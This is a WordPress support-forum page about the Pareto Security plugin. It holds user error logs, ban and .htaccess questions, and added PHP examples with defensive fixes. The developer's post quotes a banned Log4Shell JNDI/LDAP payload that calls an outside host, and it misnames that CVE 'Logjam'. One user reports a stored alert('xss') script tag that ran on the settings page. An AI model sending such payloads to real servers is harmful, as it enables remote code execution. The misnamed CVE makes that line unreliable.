Haven’t revised my debug.log for quite some time. Glancing at it now found these recurring lines:
[12-Mar-2024 20:23:11 UTC] PHP Fatal error: Maximum execution time of 300 seconds exceeded in /wp-content/plugins/pareto-security/pareto_functions.php on line 1152
[24-Apr-2024 14:01:05 UTC] PHP Warning: Cannot modify header information – headers already sent in /wp-content/plugins/pareto-security/pareto_functions.php on line 71
[16-May-2024 00:00:54 UTC] PHP Fatal error: Maximum execution time of 300 seconds exceeded in /wp-content/plugins/pareto-security/pareto_functions.php on line 1154
[18-May-2024 09:02:44 UTC] PHP Fatal error: Maximum execution time of 300 seconds exceeded in /public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 1155
Hello
I am using Pareto Security for many subdomains but just on one of them Elementor does not load the first page. I saw when I deactivate Pareto Security Elementor works.
Thanks
Every few months, I get a strange issue that fills the debug.log with gigabytes of data in a few minutes until using all available disk space, and until I restart the PHP service and delete the said log. I haven’t been able to see what’s inside such huge debug.log, until now. Gigabytes of this:
PHP Warning: Undefined variable $remval in /wp-content/plugins/pareto-security/pareto_functions.php on line 1155
I get this error msg
Got error ‘PHP message: PHP Warning: Constant DB_CHARSET already defined in /public_html/wp-config.php on line 88’, referer: /wp-admin/admin.php?page=pareto_security_settings
How can I stop it? Please feel free to help me.
Tweaked crontab to use CLI instead of cURL and now these have started showing up on each cycle:
PHP Warning: Undefined array key "REQUEST_METHOD" in /wp-content/plugins/pareto-security/pareto_functions.php on line 1165
PHP Warning: Undefined array key "REQUEST_METHOD" in /wp-content/plugins/pareto-security/pareto_functions.php on line 1267
Hi @te_taipo,
Been using this plugin for years, thank you.
Been getting some errors recently…
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "SERVER_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2379
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "SERVER_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2379
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "SERVER_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2379
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "SCRIPT_FILENAME" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 1992
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REQUEST_METHOD" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 890
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "SCRIPT_FILENAME" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 1992
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REQUEST_METHOD" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 1014
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REQUEST_METHOD" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 1150
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REQUEST_METHOD" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 1218
…Sean
Thank you for your plugin dev.
I’ve seen this error, this am on two sites…
Undefined variable $header in…plugins/pareto-security/pareto_functions.php on line 1865
Undefined array key “” …plugins/pareto-security/pareto_functions.php on line 1865
Using HetrixTools as my uptime monitor. It’s started being blocked by this plugin. Please allow.
[blocked] crawler/user-agent: 'hetrixtools uptime monitoring bot. https://hetrix.tools/uptime-monitoring-bot.html'
https://docs.hetrixtools.com/uptime-monitoring-ip-addresses/
Some entries have started showing up in the debug.log after hitting the WC > home menu of the latest WC update.
PHP Warning: Undefined array key 0 in \plugins\pareto-security\pareto_functions.php on line 720
PHP Warning: Array to string conversion in \plugins\pareto-security\pareto_functions.php on line 723
I’m getting these in the logs from time to time:
PHP Fatal error: Maximum execution time of 60 seconds exceeded in /plugins/pareto-security/pareto_functions.php on line 2545
Very simple and effective security plugin to stop bad crawlers and attacks.
But as soon as I installed and activated this plugin in Hard Ban settings, I got website down notification from Updown.io and also from Fathom analytics (tracking.healthcarentsickcare.com). Is there any way to whitelist the crawlers?
Thank you
Vivek
I’ve switched to PHP8 on live recently. Lately noticed debug.log has started steadily filling with these:
PHP Warning: Undefined array key 109 in /plugins/pareto-security/pareto_functions.php on line 2092
PHP Warning: Undefined array key 110 in /plugins/pareto-security/pareto_functions.php on line 2095
PHP Warning: Undefined array key 110 in /plugins/pareto-security/pareto_functions.php on line 2096
Is Pareto compatible with the OpenLiteSpeed Web Server (LWS)? I’m reading their .htaccess handling is rather idiosyncratic.
Logjam (CVE-2021-44228) https://nvd.nist.gov/vuln/detail/CVE-2021-44228
If your site is hosted on an Apache web server, and you are a user of Pareto Security and have Hardban settings enabled this would have and will prevent the Logjam attack from exploiting the webserver via your website.
I have also added in a filter in the latest update that prevents this attack regardless of whether or not you are using the more advanced settings in Pareto Security.
Log entries in this plugin will look like the following:
[banned] attempted attack :: user-agent: ‘${jndi:ldap://73a93a21510f.bingsearchlib.com:39356/a}’
There are variations on this attack which will all be banned by Pareto Security
Hello
I am using this lovely plugin for some years.
In this week I had random “forbidden! you do not have access …”.
Today I had “A timeout occurred 524 Cloudflare ” error.
I renamed my plugin folder and I received this email.
“Since WordPress 5.2 there is a built-in feature that detects when a plugin or theme causes a fatal error on your site, and notifies you with this automated email.
In this case, WordPress caught an error with one of your plugins, Pareto Security.”
I removed the plugin temporarily. The site is OK.
What is the problem?
Thanks
WordPress version 5.8.2
PHP version 7.4.1
Today noticed getting the debug.log slowly filled with this block of entries:
PHP Warning: fopen(https://www.quic.cloud/ips): failed to open stream: Connection timed out in /wp-content/plugins/pareto-security/pareto_functions.php on line 2525
PHP Warning: stream_set_blocking() expects parameter 1 to be resource, bool given in /wp-content/plugins/pareto-security/pareto_functions.php on line 2526
PHP Warning: fread() expects parameter 1 to be resource, bool given in /wp-content/plugins/pareto-security/pareto_functions.php on line 2527
PHP Warning: fclose() expects parameter 1 to be resource, bool given in /wp-content/plugins/pareto-security/pareto_functions.php on line 2528
Thanks.
The plugin started blocking the server’s IP, and therefore the site became inaccessible to anyone.
I added an IP to the white list, this was enough for 10-15 minutes, then everything was blocked again.
It is necessary to manually delete the IP in .htaccess
Some time ago, added define('DISALLOW_FILE_EDIT', true); in wp-config.php, as an extra security measure suggested from somewhere. Today, noticed another plugin (RankMath) complaining about how it can’t write to robots.txt, so after some investigation had to revert back to define('DISALLOW_FILE_EDIT', false);
Is Pareto Security sensitive too to the aforementioned setting, while handling .htaccess and the banned IPs list?
Thanks.
I’m trying to fine-tune a cache plugin. Noticed PS uses NONCE’s in many places in the code. NONCE has a default TTL of ~10-24h, which means one may have to clear the page cache in that interval before it becomes invalid. That’s too often in some usage scenarios, as it may reflect negatively on the server resources during regeneration.
Are PS’s nonces really used in the frontend, or only in wp-admin? If the former applies, is there a different nonce TTL for PS that’s still safe for caching?
Thanks.
Every other week PS is banning my home IP or the live server IP. How to put both IP’s in an allowed list, so they don’t get blocked again? Thanks.
Hi @te_taipo,
Just noticed these entries in all my error logs…
[28-Oct-2020 10:10:01 UTC] PHP Fatal error: Uncaught Error: Function name must be a string in /home/oldtownweb/public_html/wp-content/plugins/pareto-security/pareto_functions.php:2341
Stack trace:
#0 /home/oldtownweb/public_html/wp-content/plugins/pareto-security/pareto_functions.php(2162): pareto_functions->getREMOTE_ADDR()
#1 /home/oldtownweb/public_html/wp-content/plugins/pareto-security/pareto_functions.php(15): pareto_functions->get_ip()
#2 /home/oldtownweb/public_html/wp-content/plugins/pareto-security/pareto_security.php(36): pareto_functions->__construct()
#3 /home/oldtownweb/public_html/wp-includes/class-wp-hook.php(286): pareto_security_init('')
#4 /home/oldtownweb/public_html/wp-includes/class-wp-hook.php(310): WP_Hook->apply_filters(NULL, Array)
#5 /home/oldtownweb/public_html/wp-includes/plugin.php(453): WP_Hook->do_action(Array)
#6 /home/oldtownweb/public_html/wp-settings.php(330): do_action('plugins_loaded')
#7 /home/oldtownweb/public_html/wp-config.php(109): require_once('/home/oldtownwe...')
#8 /home/oldtownweb/public_html/wp-load.php( in /home/oldtownweb/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2341
…Sean
Fresh install, no other plugins – 5.5.1 WP
Opening an external link using allow_url_open where it expects only local files looks to be creating an issue.
Is currently disabled, please consider this urgent.
[15-Oct-2020 07:58:10 UTC] PHP Warning: fopen(): https:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2145
[15-Oct-2020 07:58:10 UTC] PHP Warning: fopen(https://www.quic.cloud/ips): failed to open stream: no suitable wrapper could be found in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2145
[15-Oct-2020 07:58:10 UTC] PHP Warning: stream_set_blocking() expects parameter 1 to be resource, bool given in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2146
[15-Oct-2020 07:58:10 UTC] PHP Warning: fread() expects parameter 1 to be resource, bool given in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2147
[15-Oct-2020 07:58:10 UTC] PHP Warning: fclose() expects parameter 1 to be resource, bool given in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2148
[15-Oct-2020 08:01:03 UTC] PHP Warning: fopen(): https:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2145
[15-Oct-2020 08:01:03 UTC] PHP Warning: fopen(https://www.quic.cloud/ips): failed to open stream: no suitable wrapper could be found in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2145
[15-Oct-2020 08:01:03 UTC] PHP Warning: stream_set_blocking() expects parameter 1 to be resource, bool given in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2146
[15-Oct-2020 08:01:03 UTC] PHP Warning: fread() expects parameter 1 to be resource, bool given in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2147
[15-Oct-2020 08:01:03 UTC] PHP Warning: fclose() expects parameter 1 to be resource, bool given in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2148
Got this in debug.log:
file_get_contents(https://www.quic.cloud/ips): failed to open stream: HTTP request failed! HTTP/1.0 503 Service Unavailable in /plugins/pareto-security/pareto_functions.php on line 2196
Looking at line 2196, it can be seen that’s indeed trying to resolve https://www.quic.cloud/ips via file_get_contents(), which is indeed returning a 503 error atm.
However, file_get_contents() is a blocking function that may degrade performance in situations like the above. Here’s a php script, for example, that calls a URL without blocking and returns immediately.
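Added example, not part of the original posts and not the plugin's code: one way to fetch a remote IP list so that a timeout, a 503 or `allow_url_fopen=0` (the three failures reported in the posts above) leaves the last good list in place and does not emit a warning on every request. The function names, the cache file and the one-entry-per-line list format are assumptions.

```php
<?php
// Added example; function names are hypothetical, not from the plugin.

/** Keep only lines that are a valid IP or IP/prefix (assumed list format). */
function example_parse_ip_lines( string $body ): array {
    $out = array();
    foreach ( preg_split( '/\R/', $body ) as $line ) {
        $parts = explode( '/', trim( $line ), 2 );
        if ( false === filter_var( $parts[0], FILTER_VALIDATE_IP ) ) {
            continue;
        }
        if ( isset( $parts[1] ) && ! ctype_digit( $parts[1] ) ) {
            continue;
        }
        $out[] = trim( $line );
    }
    return $out;
}

/** Return the cached list, refreshing it from $source at most once per $max_age seconds. */
function example_fetch_ip_list( string $source, string $cache, int $timeout = 3, int $max_age = 86400 ): array {
    $fresh = is_readable( $cache ) && ( time() - filemtime( $cache ) ) < $max_age;
    if ( ! $fresh ) {
        $is_url = (bool) preg_match( '#^https?://#i', $source );
        $body   = false;
        // Skip the call entirely when the URL wrapper is disabled (allow_url_fopen=0).
        if ( ! $is_url || filter_var( ini_get( 'allow_url_fopen' ), FILTER_VALIDATE_BOOLEAN ) ) {
            $ctx  = stream_context_create( array( 'http' => array( 'timeout' => $timeout ) ) );
            $body = @file_get_contents( $source, false, $ctx ); // failure is handled below
        }
        if ( false !== $body && array() !== example_parse_ip_lines( $body ) ) {
            file_put_contents( $cache, $body, LOCK_EX );
        } else {
            // Timeout, 503 or disabled wrapper: keep the old list and back off
            // until $max_age passes instead of retrying on every request.
            touch( $cache );
        }
    }
    return example_parse_ip_lines( (string) file_get_contents( $cache ) );
}

// Constructed demo: a local file stands in for the remote list so this runs offline.
$src   = tempnam( sys_get_temp_dir(), 'src' );
$cache = tempnam( sys_get_temp_dir(), 'ips' );
file_put_contents( $src, "192.0.2.10\n198.51.100.0/24\nnot-an-ip\n" );
touch( $cache, time() - 90000 );                               // force a refresh
print_r( example_fetch_ip_list( $src, $cache ) );              // list read from the source
touch( $cache, time() - 90000 );
print_r( example_fetch_ip_list( $src . '.missing', $cache ) ); // source down: cached list
```

The short timeout bounds how long one request can block, and the back-off means a dead endpoint costs at most one such wait per `$max_age` window.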
How does your security compare with BBQ Firewall?
Is it similar, or is there any difference?
Thanks
What happens when an attack comes through a public-facing proxy/firewall, etc. front to potentially large number of users/customers? Just putting it on a deny list in .htaccess is denying access to a lot of people, no? How to handle this? Thanks.
Hi,
Just want to feedback the fatal error produced by my server using version 2.7.0
The error message is as follows:
PHP Fatal error: Uncaught Error: Function name must be a string in /var/www/html/wp-content/plugins/pareto-security/pareto_functions.php:2341
Stack trace:
#0 /var/www/html/wp-content/plugins/pareto-security/pareto_functions.php(2162): pareto_functions->getREMOTE_ADDR()
#1 /var/www/html/wp-content/plugins/pareto-security/pareto_functions.php(15): pareto_functions->get_ip()
#2 /var/www/html/wp-content/plugins/pareto-security/pareto_security.php(36): pareto_functions->__construct()
#3 /var/www/html/wp-includes/class-wp-hook.php(287): pareto_security_init('')
#4 /var/www/html/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters(NULL, Array)
#5 /var/www/html/wp-includes/plugin.php(478): WP_Hook->do_action(Array)
#6 /var/www/html/wp-settings.php(403): do_action('plugins_loaded')
#7 /var/www/wp-config.php(134): require_once('/var/www/html/w...')
#8 /var/www/html/wp-load.php(42): require_once('/var/www/wp-con...')
#9 /var/www/html/wp-cron.php(44): require_once('/var/www/html/w...')
#10 {main}
thrown in /var/www/html/wp-content/plugins/pareto-security/pareto_functions.php on line 2341
The error produced when running wp-cron.php – not visible due to WordPress error masking on the browser – but from the terminal php wp-cron.php creates the error.
Following the message, pareto_functions.php:2341 falls into this simple function:
/**
 * getREMOTE_ADDR()
 */
function getREMOTE_ADDR() {
    if ( false !== getenv( 'REMOTE_ADDR' ) &&
        ( false !== ( bool ) $this->string_prop( getenv( 'REMOTE_ADDR' ), 2 ) ) &&
        false !== $this->check_ip( getenv( 'REMOTE_ADDR' ) ) ) {
        return getenv( 'REMOTE_ADDR' );
    } elseif (
        false !== $_SERVER( 'REMOTE_ADDR' ) &&
        ( false !== ( bool ) $this->string_prop( $_SERVER( 'REMOTE_ADDR' ), 2 ) ) &&
        false !== $this->check_ip( $_SERVER( 'REMOTE_ADDR' ) ) ) {
        return $_SERVER[ 'REMOTE_ADDR' ];
    }
}
...somewhere along the "elseif" line... so I just remarked all the lines as comments except 'return $_SERVER[ 'REMOTE_ADDR' ];' as a temporary measure and the error disappeared. So, that confirms the source.
Thanks for the great plugins !
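Added example, not part of the original post and not the plugin's code: in the function quoted above, `$_SERVER( 'REMOTE_ADDR' )` calls the superglobal array as if it were a function, which PHP 7 reports as "Function name must be a string"; under `php wp-cron.php` the key is also simply absent, which is the source of the "Undefined array key" warnings in the CLI cron posts earlier on this page. The sketch below reads the values with array access and a guard, and uses `filter_var()` in place of the plugin's `string_prop()` and `check_ip()`, whose internals the page does not show. All helper names are hypothetical.

```php
<?php
// Added example; the helper names are hypothetical, not from the plugin.

/** Read one $_SERVER-style key without a warning when it is missing. */
function example_server_value( array $server, string $key, string $default = '' ): string {
    return ( isset( $server[ $key ] ) && is_string( $server[ $key ] ) ) ? $server[ $key ] : $default;
}

/** Validated client IP, or null when there is none (CLI cron, junk value). */
function example_remote_addr( array $server ): ?string {
    $env        = getenv( 'REMOTE_ADDR' );
    $candidates = array(
        is_string( $env ) ? $env : '',
        example_server_value( $server, 'REMOTE_ADDR' ), // [] access, never $server( ... )
    );
    foreach ( $candidates as $ip ) {
        if ( false !== filter_var( $ip, FILTER_VALIDATE_IP ) ) {
            return $ip;
        }
    }
    return null;
}

/** True only for a real HTTP request, so request filters can be skipped for CLI runs. */
function example_is_http_request( array $server, string $sapi = PHP_SAPI ): bool {
    return 'cli' !== $sapi
        && '' !== example_server_value( $server, 'REQUEST_METHOD' )
        && null !== example_remote_addr( $server );
}

// Constructed inputs: a web request, a CLI cron run, and a malformed address.
$web = array( 'REMOTE_ADDR' => '203.0.113.7', 'REQUEST_METHOD' => 'GET' );
$cli = array( 'SCRIPT_FILENAME' => 'wp-cron.php' );
$bad = array( 'REMOTE_ADDR' => '203.0.113.999', 'REQUEST_METHOD' => 'GET' );

var_dump( example_remote_addr( $web ), example_remote_addr( $cli ), example_remote_addr( $bad ) );
var_dump( example_is_http_request( $web, 'fpm-fcgi' ), example_is_http_request( $cli, 'cli' ) );
```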
Hi @te_taipo,
I’ve been having a problem where a rule I have in .htaccess changes every time Pareto Security updates the ip list…
<FilesMatch "^.*(error_log|debug\.log|xmlrpc\.php|wp-config\.php|php\.ini|\.[hH][tT][aApP].*)$">
order allow,deny
deny from all
</FilesMatch>
becomes…
<FilesMatch "^.*(error_log|debug\.log|xmlrpc\.php|wp-config\.php|php\.ini|\.[hH][tT][aApP].*)$">
</FilesMatch>
I deactivated Pareto Security on one site for two weeks. Every morning I check, and the rule changes on all sites except that one.
The only other plugin I use that writes to .htaccess is Litespeed Cache. If I update the settings, it creates a new .htaccess file, and the rule doesn’t change when that happens.
Thanks in advance,
Sean
Notice Undefined index: SERVER_ADDR
If your server is IIS you will be seeing this error in Pareto Security versions 2.6.8 and earlier
This is fixed in the latest version 2.6.9
Hi @te_taipo
Had an odd thing happen when navigating to settings page in Chrome (Iridium). Got a popup that says xss. It was caused by alert(“xss”) enclosed in script tags in the source code of one of the log entries. I have screen shots. Don’t see a way to add them here though.
…Sean
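Added example, not part of the original post and not the plugin's code: the popup described above is what happens when a stored log entry containing request data is written into an admin page without output escaping. The sketch below keeps each entry to one printable line when it is recorded and escapes it when it is rendered; the function names are hypothetical and the sample entries are constructed in the log format quoted on this page.

```php
<?php
// Added example; names are hypothetical, not from the plugin.

/** Build one log line; request data is reduced to a single printable line. */
function example_log_line( string $action, string $field, string $value ): string {
    // Drop control characters (CR/LF included) so a header cannot forge extra entries.
    $value = preg_replace( '/[\x00-\x1F\x7F]/', '', $value );
    return sprintf( "[%s] %s: '%s'", $action, $field, substr( $value, 0, 512 ) );
}

/** Render stored lines for an admin page; every line is escaped at output time. */
function example_render_log( array $lines ): string {
    $html = "<ul>\n";
    foreach ( $lines as $line ) {
        $html .= '<li>' . htmlspecialchars( $line, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' ) . "</li>\n";
    }
    return $html . "</ul>\n";
}

// Constructed entries in the log format quoted on this page.
$lines = array(
    example_log_line( 'blocked', 'crawler/user-agent', 'hetrixtools uptime monitoring bot' ),
    example_log_line( 'banned', 'attempted attack :: user-agent', "<script>alert(\"xss\")</script>\r\n[fake] entry" ),
);
echo example_render_log( $lines );
```

Inside WordPress, `esc_html()` is the usual call for the same output escaping.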
Hi, got these today in the debug.log:
PHP Warning: array_merge(): Argument #3 is not an array in /wp-content/plugins/pareto-security/pareto_functions.php on line 696
PHP Warning: array_unique() expects parameter 1 to be array, null given in /wp-content/plugins/pareto-security/pareto_functions.php on line 697
PHP Warning: count(): Parameter must be an array or an object that implements Countable in /wp-content/plugins/pareto-security/pareto_functions.php on line 698
WP and PS fully updated, on Linux/PHP7.2.
Thanks.